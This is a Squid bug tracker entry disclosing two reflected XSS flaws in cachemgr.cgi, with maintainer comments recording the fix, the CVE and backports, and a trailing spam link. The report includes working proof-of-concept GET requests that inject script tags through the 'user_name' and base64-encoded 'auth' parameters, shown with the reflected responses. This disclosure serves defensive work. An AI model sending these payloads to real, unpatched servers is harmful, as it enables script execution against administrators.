Bug 4957 - Multiple XSS issues in cachemgr.cgi
Summary: Multiple XSS issues in cachemgr.cgi
Status: RESOLVED FIXED
Alias: None
Product: Squid
Classification: Unclassified
Component: tools: cachemgr.cgi (show other bugs)
Version: unspecified
Hardware: All All
: P1 critical
Assignee: SQUID BUGS ALIAS
URL:
Depends on:
Blocks:
 
Reported: 2019-05-27 13:38 UTC by PAZ
Modified: 2024-02-15 08:34 UTC (History)
1 user (show)

See Also:
Browser: ---
Fixed Versions: 4.8
Needs:


Attachments
Screenshots of the XSS issues (348.67 KB, application/zip)
2019-05-27 13:38 UTC, PAZ
Details

Note You need to log in before you can comment on or make changes to this bug.
Description PAZ 2019-05-27 13:38:06 UTC
Created attachment 3715 [details]
Screenshots of the XSS issues

The "cachemgr.cgi" web module of the squid proxy is vulnerable to XSS issue. The vulnerable parameters "user_name" and "auth" have insufficient sanitization in place.

The method(rfc_1738_unescape()) defined in source code /lib/rec1738.c was not enforced to all HTTP response params per request type defined in the cachemgr.cc source code.

For instance; on line 1092 of the source file /squid/tools/cachemgr.cc , the decode_pub_auth() method does not enforce any sanitization for the parameters which are parsed by strok() which causes the first XSS vulnerability.

The first XSS vulnerability found on the "auth" parameter can be triggered by submitting the following GET request:

HTTP Request:

GET /cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=admin&operation=authenticate&auth=bG9jYWxob3N0fDE1NTg5NTYzNzJ8YWRtIj48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0PmlufGRzZGFkYWE= HTTP/1.1
Host: 10.211.55.3
[SNIPPED]

HTTP Response:

HTTP/1.1 200 OK
Date: Mon, 27 May 2019 12:18:58 GMT
Server: Apache/2.4.25 (Debian)
[SNIPPED]

<TR><TH ALIGN="left">Cache Host:</TH><TD><INPUT NAME="host" size="30" VALUE="localhost"></TD></TR>
<TR><TH ALIGN="left">Cache Port:</TH><TD><INPUT NAME="port" size="30" VALUE="3128"></TD></TR>
<TR><TH ALIGN="left">Manager name:</TH><TD><INPUT NAME="user_name" size="30" VALUE="adm"><script>alert('XSS')</script>in"></TD></TR>
[SNIPPED]

The payload within the base64 encoded( bG9jYWxob3N0fDE1NTg5NTYzNzJ8YWRtIj48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0PmlufGRzZGFkYWE= ) auth value is:
localhost|1558956372|adm"><script>alert('XSS')</script>in|dsdadaa

The other second vulnerable parameter "username" can be exploited by submitting the following HTTP GET request:

HTTP Request:
GET /cgi-bin/cachemgr.cgi?server=&host=localhost&port=3128&user_name=ad"><script>alert('XSS')</script>min&passwd= HTTP/1.1
Host: 10.211.55.3
[SNIPPED]

HTTP Response:
HTTP/1.1 200 200 OK
[SNIPPED]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd%22%3E
<HTML><HEAD><TITLE>CacheMgr@localhost: menu</TITLE>
<STYLE type="text/css"><!--BODY{background-color:#ffffff;font-family:verdana,sans-serif}TABLE{background-color:#333333;border:0pt;padding:0pt}TH,TD{background-color:#ffffff;white-space:nowrap}--></STYLE>
</HEAD><BODY>
<H2><a href="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=authenticate&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager</a> menu for localhost:</H2><UL>
<UL>
<LI type="disk"><A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=index&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager Interface</A>
<LI type="disk"><A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=menu&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager Menu</A>
<LI type="circle">Toggle offline_mode setting (hidden)<A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=offline_toggle&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">.</A>
<LI type="circle">Shut Down the Squid Process (hidden)<A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=shutdown&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">.</A>
[SNIPPED]
Please check the screenshot for the proofs.
Comment 1 Amos Jeffries 2019-07-05 03:28:17 UTC
https://github.com/squid-cache/squid/pull/429 has been opened to resolve the issue of insufficient normalization and escaping of the HTML outputs.
Comment 2 Amos Jeffries 2019-07-07 10:26:31 UTC
PR has been applied to Squid-5.

It also appears CVE-2019-13345 has been assigned for this issue.
Comment 3 Amos Jeffries 2019-07-11 13:41:24 UTC
Applied to squid-3.5 as well
Comment 5 spam 2024-02-15 08:34:39 UTC
Nice!! issue resolved
https://attestationuae.com